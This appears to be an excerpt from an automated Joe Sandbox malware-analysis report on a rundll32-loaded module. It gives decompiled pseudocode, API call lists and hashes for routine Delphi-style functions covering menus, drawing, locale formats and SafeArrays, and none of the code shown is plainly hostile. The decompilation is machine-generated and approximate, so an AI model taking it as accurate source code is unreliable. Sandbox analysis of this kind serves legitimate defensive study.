                          • RectVisible.GDI32(55DFEBFF,?), ref: 02831E41
                          • SaveDC.GDI32(55DFEBFF), ref: 02831E57
                          • IntersectClipRect.GDI32(55DFEBFF,00000000,00000000,?,?), ref: 02831E7A
                          • RestoreDC.GDI32(55DFEBFF,55DFEBFF), ref: 02831E95
                          • CreateSolidBrush.GDI32(00000000), ref: 02831F16
                          • FrameRect.USER32(55DFEBFF,?,?), ref: 02831F49
                          • DeleteObject.GDI32(?), ref: 02831F53
                          • CreateSolidBrush.GDI32(00000000), ref: 02831F63
                          • FrameRect.USER32(55DFEBFF,?,00000000), ref: 02831F96
                          • DeleteObject.GDI32(00000000), ref: 02831FA0
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                          • String ID:
                          • API String ID: 375863564-0
                          • Opcode ID: 761338f981581ffe745c768f89a24fa613c36c75ac7ea6be38cbc274a34e28f9
                          • Instruction ID: 6ccca9c3cc5eacda6a4c48e43c93a46e9b1f433cb877068f9b0d5b6c1516b223
                          • Opcode Fuzzy Hash: 761338f981581ffe745c768f89a24fa613c36c75ac7ea6be38cbc274a34e28f9
                          • Instruction Fuzzy Hash: D25191792043449FDB16DF28C8C8B6B77E9AF48704F044458EE8DCB25ADB75E845CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02818E6C(intOrPtr _a4) {
                          				struct HMENU__* _v8;
                          				intOrPtr _t38;
                          
                          				_t2 = _a4 - 4; // 0xfffffeb1
                          				_t38 =  *_t2;
                          				if( *((char*)(_t38 + 0x229)) != 0) {
                          					_t5 = _a4 - 4; // 0xfffffeb1
                          					_t38 =  *_t5;
                          					if(( *(_t38 + 0x228) & 0x00000001) != 0) {
                          						_t10 = _a4 - 4; // 0xfffffeb1
                          						_t38 =  *_t10;
                          						if( *((char*)(_t38 + 0x22f)) != 1) {
                          							_t13 = _a4 - 4; // 0xfffffeb1
                          							_v8 = GetSystemMenu(E02833F7C( *_t13), 0);
                          							_t16 = _a4 - 4; // 0xfffffeb1
                          							if( *((char*)( *_t16 + 0x229)) == 3) {
                          								DeleteMenu(_v8, 0xf130, 0);
                          								DeleteMenu(_v8, 7, 0x400);
                          								DeleteMenu(_v8, 5, 0x400);
                          								DeleteMenu(_v8, 0xf030, 0);
                          								DeleteMenu(_v8, 0xf020, 0);
                          								DeleteMenu(_v8, 0xf000, 0);
                          								return DeleteMenu(_v8, 0xf120, 0);
                          							}
                          							_t26 = _a4 - 4; // 0xfffffeb1
                          							if(( *( *_t26 + 0x228) & 0x00000002) == 0) {
                          								EnableMenuItem(_v8, 0xf020, 1);
                          							}
                          							_t32 = _a4 - 4; // 0xfffffeb1
                          							_t38 =  *_t32;
                          							if(( *(_t38 + 0x228) & 0x00000004) == 0) {
                          								return EnableMenuItem(_v8, 0xf030, 1);
                          							}
                          						}
                          					}
                          				}
                          				return _t38;
                          			}






                          APIs
                          • GetSystemMenu.USER32(00000000,00000000), ref: 02818EB7
                          • DeleteMenu.USER32(?,0000F130,00000000,00000000,00000000), ref: 02818ED9
                          • DeleteMenu.USER32(?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 02818EE9
                          • DeleteMenu.USER32(?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 02818EF9
                          • DeleteMenu.USER32(?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 02818F09
                          • DeleteMenu.USER32(?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000), ref: 02818F19
                          • DeleteMenu.USER32(?,0000F000,00000000,?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?), ref: 02818F29
                          • DeleteMenu.USER32(?,0000F120,00000000,?,0000F000,00000000,?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?), ref: 02818F39
                          • EnableMenuItem.USER32(?,0000F020,00000001), ref: 02818F5A
                          • EnableMenuItem.USER32(?,0000F030,00000001), ref: 02818F79
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$Delete$EnableItem$System
                          • String ID:
                          • API String ID: 3985193851-0
                          • Opcode ID: 4b8013cda5f35cb945b127675c6f6975a68485a3bd6933c3827328d5857be857
                          • Instruction ID: d64e40244b235084cfaebef899cb7016aa40b9fe29e215de95a775bcf5e6bec3
                          • Opcode Fuzzy Hash: 4b8013cda5f35cb945b127675c6f6975a68485a3bd6933c3827328d5857be857
                          • Instruction Fuzzy Hash: B5311C78744305BBEB11DBA8DD4EF997BFA9B04704F104090B648EF6D1C7B5AA809B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0282D36C(intOrPtr* __eax, int __ecx, int __edx) {
                          				char _t62;
                          				signed int _t64;
                          				signed int _t65;
                          				signed char _t107;
                          				intOrPtr _t113;
                          				intOrPtr _t114;
                          				int _t117;
                          				intOrPtr* _t118;
                          				int _t119;
                          				int* _t121;
                          
                          				 *_t121 = __ecx;
                          				_t117 = __edx;
                          				_t118 = __eax;
                          				if(__edx ==  *_t121) {
                          					L29:
                          					_t62 =  *0x282d518; // 0x0
                          					 *((char*)(_t118 + 0x98)) = _t62;
                          					return _t62;
                          				}
                          				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                          					_t107 =  *0x282d510; // 0x1f
                          				} else {
                          					_t4 = _t118 + 0x98; // 0x21880c6
                          					_t107 =  *_t4;
                          				}
                          				if((_t107 & 0x00000001) == 0) {
                          					_t8 = _t118 + 0x40; // 0xc60001d5
                          					_t119 =  *_t8;
                          				} else {
                          					_t7 = _t118 + 0x40; // 0xc60001d5
                          					_t119 = MulDiv( *_t7, _t117,  *_t121);
                          				}
                          				if((_t107 & 0x00000002) == 0) {
                          					_t13 = _t118 + 0x44; // 0x8b00f745
                          					_t121[1] =  *_t13;
                          				} else {
                          					_t11 = _t118 + 0x44; // 0x8b00f745
                          					_t121[1] = MulDiv( *_t11, _t117,  *_t121);
                          				}
                          				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                          					_t27 = _t118 + 0x48; // 0x408bf845
                          					_t64 =  *_t27;
                          					_t121[2] = _t64;
                          				} else {
                          					if((_t107 & 0x00000001) == 0) {
                          						_t25 = _t118 + 0x48; // 0x408bf845
                          						_t64 = MulDiv( *_t25, _t117,  *_t121);
                          						_t121[2] = _t64;
                          					} else {
                          						_t22 = _t118 + 0x40; // 0xc60001d5
                          						_t23 = _t118 + 0x48; // 0x408bf845
                          						_t64 = MulDiv( *_t22 +  *_t23, _t117,  *_t121) - _t119;
                          						_t121[2] = _t64;
                          					}
                          				}
                          				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                          				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                          					_t46 = _t118 + 0x4c; // 0x1e88304
                          					_t121[3] =  *_t46;
                          				} else {
                          					if(_t65 == 0) {
                          						_t44 = _t118 + 0x44; // 0x8b00f745
                          						_t121[3] = MulDiv( *_t44, _t117,  *_t121);
                          					} else {
                          						_t40 = _t118 + 0x44; // 0x8b00f745
                          						_t41 = _t118 + 0x4c; // 0x1e88304
                          						_t121[3] = MulDiv( *_t40 +  *_t41, _t117,  *_t121) - _t121[1];
                          					}
                          				}
                          				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                          				_t113 =  *0x282d518; // 0x0
                          				if(_t113 != (_t107 &  *0x282d514)) {
                          					_t52 = _t118 + 0x90; // 0xebfffbe9
                          					 *(_t118 + 0x90) = MulDiv( *_t52, _t117,  *_t121);
                          				}
                          				_t114 =  *0x282d518; // 0x0
                          				if(_t114 != (_t107 &  *0x282d51c)) {
                          					_t54 = _t118 + 0x94; // 0xfc458bef
                          					 *(_t118 + 0x94) = MulDiv( *_t54, _t117,  *_t121);
                          				}
                          				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                          					_t59 = _t118 + 0x68; // 0xf7558a02
                          					E027F7778( *_t59, MulDiv(E027F775C( *_t59), _t117,  *_t121));
                          				}
                          				goto L29;
                          			}














                          APIs
                          • MulDiv.KERNEL32(C60001D5,?,02814F77), ref: 0282D3A5
                          • MulDiv.KERNEL32(8B00F745,?,02814F77), ref: 0282D3BF
                          • MulDiv.KERNEL32(408BF845,?,8B00F745), ref: 0282D3ED
                          • MulDiv.KERNEL32(408BF845,?,8B00F745), ref: 0282D403
                          • MulDiv.KERNEL32(01E88304,?,408BF845), ref: 0282D43B
                          • MulDiv.KERNEL32(8B00F745,?,408BF845), ref: 0282D453
                          • MulDiv.KERNEL32(EBFFFBE9,?,0000001F), ref: 0282D49D
                          • MulDiv.KERNEL32(FC458BEF,?,0000001F), ref: 0282D4C6
                          • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0282D4EC
                            • Part of subcall function 027F7778: MulDiv.KERNEL32(00000000,?,00000048), ref: 027F7785
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e352711abd8c07a043cd20a822ff16f839b3cc5dbccdad5cc756ad3b54be084
                          • Instruction ID: 0db7a18040777ea598774942daefe960643cc0aed3149412049ac8dcd65408b3
                          • Opcode Fuzzy Hash: 3e352711abd8c07a043cd20a822ff16f839b3cc5dbccdad5cc756ad3b54be084
                          • Instruction Fuzzy Hash: 85515FB86083646FC325DF68C544B6ABBFDAF49204F088C1DA9D9C7351D735E889CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0281D0B8(intOrPtr __eax, void* __ecx) {
                          				intOrPtr _v8;
                          				struct HMENU__* _v12;
                          				struct _WNDCLASSA _v52;
                          				char _v56;
                          				char* _t41;
                          				CHAR* _t46;
                          				struct HINSTANCE__* _t47;
                          				intOrPtr* _t49;
                          				signed int _t52;
                          				intOrPtr* _t53;
                          				signed int _t56;
                          				struct HINSTANCE__* _t57;
                          				void* _t60;
                          				CHAR* _t61;
                          				char* _t72;
                          				char* _t80;
                          				struct HINSTANCE__* _t93;
                          				intOrPtr _t95;
                          				intOrPtr _t105;
                          				void* _t113;
                          				short _t118;
                          
                          				_v56 = 0;
                          				_v8 = __eax;
                          				_push(_t113);
                          				_push(0x281d288);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t113 + 0xffffffcc;
                          				if( *((char*)(_v8 + 0xa4)) != 0) {
                          					L13:
                          					_pop(_t105);
                          					 *[fs:eax] = _t105;
                          					_push(0x281d28f);
                          					return E027D40E8( &_v56);
                          				}
                          				_t41 =  *0x286465c; // 0x286504c
                          				if( *_t41 != 0) {
                          					goto L13;
                          				}
                          				 *(_v8 + 0x40) = E027F48F8(E0281D794, _v8);
                          				 *0x2863d80 = L027D6A3C;
                          				_t46 =  *0x2863da0; // 0x281ccf8
                          				_t47 =  *0x2865668; // 0x27d0000
                          				if(GetClassInfoA(_t47, _t46,  &_v52) == 0) {
                          					_t93 =  *0x2865668; // 0x27d0000
                          					 *0x2863d8c = _t93;
                          					_t118 = RegisterClassA(0x2863d7c);
                          					if(_t118 == 0) {
                          						_t95 =  *0x2864364; // 0x27f53dc
                          						E027D6018(_t95,  &_v56);
                          						E027DBBC4(_v56, 1);
                          						E027D3A9C();
                          					}
                          				}
                          				_t49 =  *0x2864444; // 0x2865890
                          				_t52 =  *((intOrPtr*)( *_t49))(0) >> 1;
                          				if(_t118 < 0) {
                          					asm("adc eax, 0x0");
                          				}
                          				_t53 =  *0x2864444; // 0x2865890
                          				_t56 =  *((intOrPtr*)( *_t53))(1, _t52) >> 1;
                          				if(_t118 < 0) {
                          					asm("adc eax, 0x0");
                          				}
                          				_push(_t56);
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_t57 =  *0x2865668; // 0x27d0000
                          				_push(_t57);
                          				_push(0);
                          				_t60 = E027D45A8( *((intOrPtr*)(_v8 + 0x8c)));
                          				_t61 =  *0x2863da0; // 0x281ccf8
                          				 *(_v8 + 0x30) = E027D7024(_t61, _t60);
                          				E027D40E8(_v8 + 0x8c);
                          				 *((char*)(_v8 + 0xa4)) = 1;
                          				SetWindowLongA( *(_v8 + 0x30), 0xfffffffc,  *(_v8 + 0x40));
                          				_t72 =  *0x28644d4; // 0x2865b98
                          				if( *_t72 != 0) {
                          					SendMessageA( *(_v8 + 0x30), 0x80, 1, E0281DED8(_v8));
                          					SetClassLongA( *(_v8 + 0x30), 0xfffffff2, E0281DED8(_v8));
                          				}
                          				_v12 = GetSystemMenu( *(_v8 + 0x30), 0);
                          				DeleteMenu(_v12, 0xf030, 0);
                          				DeleteMenu(_v12, 0xf000, 0);
                          				_t80 =  *0x28644d4; // 0x2865b98
                          				if( *_t80 != 0) {
                          					DeleteMenu(_v12, 0xf010, 0);
                          				}
                          				goto L13;
                          			}

























                          APIs
                            • Part of subcall function 027F48F8: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 027F4916
                          • GetClassInfoA.USER32(027D0000,0281CCF8,?), ref: 0281D120
                          • RegisterClassA.USER32(02863D7C), ref: 0281D138
                            • Part of subcall function 027D6018: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 027D6049
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0281D1E5
                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0281D20B
                          • SetClassLongA.USER32(?,000000F2,00000000), ref: 0281D222
                          • GetSystemMenu.USER32(?,00000000,?,000000FC,?), ref: 0281D230
                          • DeleteMenu.USER32(?,0000F030,00000000,?,00000000,?,000000FC,?), ref: 0281D243
                          • DeleteMenu.USER32(?,0000F000,00000000,?,0000F030,00000000,?,00000000,?,000000FC,?), ref: 0281D253
                          • DeleteMenu.USER32(?,0000F010,00000000,?,0000F000,00000000,?,0000F030,00000000,?,00000000,?,000000FC,?), ref: 0281D26D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                          • String ID:
                          • API String ID: 2103932818-0
                          • Opcode ID: 2d1a90876ea1c369594e8231a8cfe8f61a928cb8be537c54780cb47be84e3a7e
                          • Instruction ID: bca2fb57b5f0543760fa2d401b9c953e2eb32e1e89b91ac4d22555bfd06e2b04
                          • Opcode Fuzzy Hash: 2d1a90876ea1c369594e8231a8cfe8f61a928cb8be537c54780cb47be84e3a7e
                          • Instruction Fuzzy Hash: 9B512679A40204AFEB11EBA8ED89FAE77FAEB09700F544490F504EB2D1C775AE00CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
                          			E0282E244(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                          				char _v5;
                          				struct HWND__* _v12;
                          				struct HDC__* _v16;
                          				void* _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				int _v32;
                          				int _v36;
                          				int _t76;
                          				intOrPtr _t82;
                          				int _t85;
                          				void* _t90;
                          				int _t91;
                          				void* _t94;
                          				void* _t95;
                          				intOrPtr _t96;
                          
                          				_t94 = _t95;
                          				_t96 = _t95 + 0xffffffe0;
                          				_v5 = __ecx;
                          				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
                          				if(_v5 == 0) {
                          					_push(__edx);
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					_pop(_t90);
                          				} else {
                          					_push(__edx);
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					_pop(_t90);
                          				}
                          				_v12 = GetDesktopWindow();
                          				_v16 = GetDCEx(_v12, 0, 0x402);
                          				_push(_t94);
                          				_push(0x282e35f);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t96;
                          				_v20 = SelectObject(_v16, E027F7CD8( *((intOrPtr*)(_t90 + 0x40))));
                          				_t91 = _v36;
                          				_t85 = _v32;
                          				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
                          				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
                          				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
                          				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
                          				SelectObject(_v16, _v20);
                          				_pop(_t82);
                          				 *[fs:eax] = _t82;
                          				_push(0x282e366);
                          				return ReleaseDC(_v12, _v16);
                          			}




















                          APIs
                          • GetDesktopWindow.USER32 ref: 0282E27B
                          • GetDCEx.USER32(?,00000000,00000402), ref: 0282E28E
                          • SelectObject.GDI32(?,00000000), ref: 0282E2B1
                          • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0282E2D7
                          • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0282E2F9
                          • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0282E318
                          • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0282E332
                          • SelectObject.GDI32(?,?), ref: 0282E33F
                          • ReleaseDC.USER32(?,?), ref: 0282E359
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSelect$DesktopReleaseWindow
                          • String ID:
                          • API String ID: 1187665388-0
                          • Opcode ID: 474ea32535d7d1d7a434a3ba660b88ccb62c18465727bb3cb7b623c4c8c7893a
                          • Instruction ID: 5545ae8028d7359f2efb5a9df72e9dbb5ea0a7cb88b34d4cc54ee11561bc9f3c
                          • Opcode Fuzzy Hash: 474ea32535d7d1d7a434a3ba660b88ccb62c18465727bb3cb7b623c4c8c7893a
                          • Instruction Fuzzy Hash: 573116BAA00219AFDB41DEEDDD89DAFBBBDEF09704B404464B518F7240C675AD048BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E027DCCA4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                          				char _v8;
                          				char _v12;
                          				char _v16;
                          				char _v20;
                          				char _v24;
                          				char _v28;
                          				char _v32;
                          				char _v36;
                          				char _v40;
                          				char _v44;
                          				char _v48;
                          				char _v52;
                          				char _v56;
                          				char _v60;
                          				char _v64;
                          				char _v68;
                          				void* _t104;
                          				void* _t111;
                          				void* _t133;
                          				intOrPtr _t183;
                          				intOrPtr _t193;
                          				intOrPtr _t194;
                          
                          				_t191 = __esi;
                          				_t190 = __edi;
                          				_t193 = _t194;
                          				_t133 = 8;
                          				do {
                          					_push(0);
                          					_push(0);
                          					_t133 = _t133 - 1;
                          				} while (_t133 != 0);
                          				_push(__ebx);
                          				_push(_t193);
                          				_push(0x27dcf6f);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t194;
                          				E027DCB30();
                          				E027DB4B8(__ebx, __edi, __esi);
                          				_t196 =  *0x2865754;
                          				if( *0x2865754 != 0) {
                          					E027DB690(__esi, _t196);
                          				}
                          				_t132 = GetThreadLocale();
                          				E027DB408(_t43, 0, 0x14,  &_v20);
                          				E027D413C(0x2865688, _v20);
                          				E027DB408(_t43, 0x27dcf84, 0x1b,  &_v24);
                          				 *0x286568c = E027D8620(0x27dcf84, 0, _t196);
                          				E027DB408(_t132, 0x27dcf84, 0x1c,  &_v28);
                          				 *0x286568d = E027D8620(0x27dcf84, 0, _t196);
                          				 *0x286568e = E027DB454(_t132, 0x2c, 0xf);
                          				 *0x286568f = E027DB454(_t132, 0x2e, 0xe);
                          				E027DB408(_t132, 0x27dcf84, 0x19,  &_v32);
                          				 *0x2865690 = E027D8620(0x27dcf84, 0, _t196);
                          				 *0x2865691 = E027DB454(_t132, 0x2f, 0x1d);
                          				E027DB408(_t132, "m/d/yy", 0x1f,  &_v40);
                          				E027DB740(_v40, _t132,  &_v36, _t190, _t191, _t196);
                          				E027D413C(0x2865694, _v36);
                          				E027DB408(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                          				E027DB740(_v48, _t132,  &_v44, _t190, _t191, _t196);
                          				E027D413C(0x2865698, _v44);
                          				 *0x286569c = E027DB454(_t132, 0x3a, 0x1e);
                          				E027DB408(_t132, 0x27dcfb8, 0x28,  &_v52);
                          				E027D413C(0x28656a0, _v52);
                          				E027DB408(_t132, 0x27dcfc4, 0x29,  &_v56);
                          				E027D413C(0x28656a4, _v56);
                          				E027D40E8( &_v12);
                          				E027D40E8( &_v16);
                          				E027DB408(_t132, 0x27dcf84, 0x25,  &_v60);
                          				_t104 = E027D8620(0x27dcf84, 0, _t196);
                          				_t197 = _t104;
                          				if(_t104 != 0) {
                          					E027D4180( &_v8, 0x27dcfdc);
                          				} else {
                          					E027D4180( &_v8, 0x27dcfd0);
                          				}
                          				E027DB408(_t132, 0x27dcf84, 0x23,  &_v64);
                          				_t111 = E027D8620(0x27dcf84, 0, _t197);
                          				_t198 = _t111;
                          				if(_t111 == 0) {
                          					E027DB408(_t132, 0x27dcf84, 0x1005,  &_v68);
                          					if(E027D8620(0x27dcf84, 0, _t198) != 0) {
                          						E027D4180( &_v12, 0x27dcff8);
                          					} else {
                          						E027D4180( &_v16, 0x27dcfe8);
                          					}
                          				}
                          				_push(_v12);
                          				_push(_v8);
                          				_push(":mm");
                          				_push(_v16);
                          				E027D4468();
                          				_push(_v12);
                          				_push(_v8);
                          				_push(":mm:ss");
                          				_push(_v16);
                          				E027D4468();
                          				 *0x2865756 = E027DB454(_t132, 0x2c, 0xc);
                          				_pop(_t183);
                          				 *[fs:eax] = _t183;
                          				_push(E027DCF76);
                          				return E027D410C( &_v68, 0x10);
                          			}


























                          APIs
                          • GetThreadLocale.KERNEL32(00000000,027DCF6F,?,?,00000000,00000000), ref: 027DCCDA
                            • Part of subcall function 027DB408: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DB426
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                          • API String ID: 4232894706-2493093252
                          • Opcode ID: bba0d13665116302f0e5a7a51ab6fa2c6c301f5472861aa76bcfb2536ed6ef92
                          • Instruction ID: 3aafc00f111eed40fd90dbb6361a6f7497f44f02e9d3b167fbf0f9bb2e8102a9
                          • Opcode Fuzzy Hash: bba0d13665116302f0e5a7a51ab6fa2c6c301f5472861aa76bcfb2536ed6ef92
                          • Instruction Fuzzy Hash: 2F616F35B001489BDB02EBA4D8987DF77B79B99304F91A47AE101FB245DA38D90ACF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E027DF5E0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                          				char _v260;
                          				char _v768;
                          				char _v772;
                          				short* _v776;
                          				intOrPtr _v780;
                          				char _v784;
                          				signed int _v788;
                          				signed short* _v792;
                          				char _v796;
                          				char _v800;
                          				intOrPtr* _v804;
                          				void* __ebp;
                          				signed char _t47;
                          				signed int _t54;
                          				void* _t62;
                          				intOrPtr* _t73;
                          				intOrPtr* _t91;
                          				void* _t93;
                          				void* _t95;
                          				void* _t98;
                          				void* _t99;
                          				intOrPtr* _t108;
                          				void* _t112;
                          				intOrPtr _t113;
                          				char* _t114;
                          				void* _t115;
                          
                          				_t100 = __ecx;
                          				_v780 = __ecx;
                          				_t91 = __edx;
                          				_v776 = __eax;
                          				if(( *(__edx + 1) & 0x00000020) == 0) {
                          					E027DF188(0x80070057);
                          				}
                          				_t47 =  *_t91;
                          				if((_t47 & 0x00000fff) != 0xc) {
                          					_push(_t91);
                          					_push(_v776);
                          					L027DDCE4();
                          					return E027DF188(_v776);
                          				} else {
                          					if((_t47 & 0x00000040) == 0) {
                          						_v792 =  *((intOrPtr*)(_t91 + 8));
                          					} else {
                          						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                          					}
                          					_v788 =  *_v792 & 0x0000ffff;
                          					_t93 = _v788 - 1;
                          					if(_t93 < 0) {
                          						L9:
                          						_push( &_v772);
                          						_t54 = _v788;
                          						_push(_t54);
                          						_push(0xc);
                          						L027DE140();
                          						_t113 = _t54;
                          						if(_t113 == 0) {
                          							E027DEEE0(_t100);
                          						}
                          						E027DF538(_v776);
                          						 *_v776 = 0x200c;
                          						 *((intOrPtr*)(_v776 + 8)) = _t113;
                          						_t95 = _v788 - 1;
                          						if(_t95 < 0) {
                          							L14:
                          							_t97 = _v788 - 1;
                          							if(E027DF554(_v788 - 1, _t115) != 0) {
                          								L027DE178();
                          								E027DF188(_v792);
                          								L027DE178();
                          								E027DF188( &_v260);
                          								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                          							}
                          							_t62 = E027DF584(_t97, _t115);
                          						} else {
                          							_t98 = _t95 + 1;
                          							_t73 =  &_v768;
                          							_t108 =  &_v260;
                          							do {
                          								 *_t108 =  *_t73;
                          								_t108 = _t108 + 4;
                          								_t73 = _t73 + 8;
                          								_t98 = _t98 - 1;
                          							} while (_t98 != 0);
                          							do {
                          								goto L14;
                          							} while (_t62 != 0);
                          							return _t62;
                          						}
                          					} else {
                          						_t99 = _t93 + 1;
                          						_t112 = 0;
                          						_t114 =  &_v772;
                          						do {
                          							_v804 = _t114;
                          							_push(_v804 + 4);
                          							_t18 = _t112 + 1; // 0x1
                          							_push(_v792);
                          							L027DE148();
                          							E027DF188(_v792);
                          							_push( &_v784);
                          							_t21 = _t112 + 1; // 0x1
                          							_push(_v792);
                          							L027DE150();
                          							E027DF188(_v792);
                          							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                          							_t112 = _t112 + 1;
                          							_t114 = _t114 + 8;
                          							_t99 = _t99 - 1;
                          						} while (_t99 != 0);
                          						goto L9;
                          					}
                          				}
                          			}






























                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027DF679
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027DF695
                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 027DF6CE
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027DF74B
                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 027DF764
                          • VariantCopy.OLEAUT32(?), ref: 027DF799
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
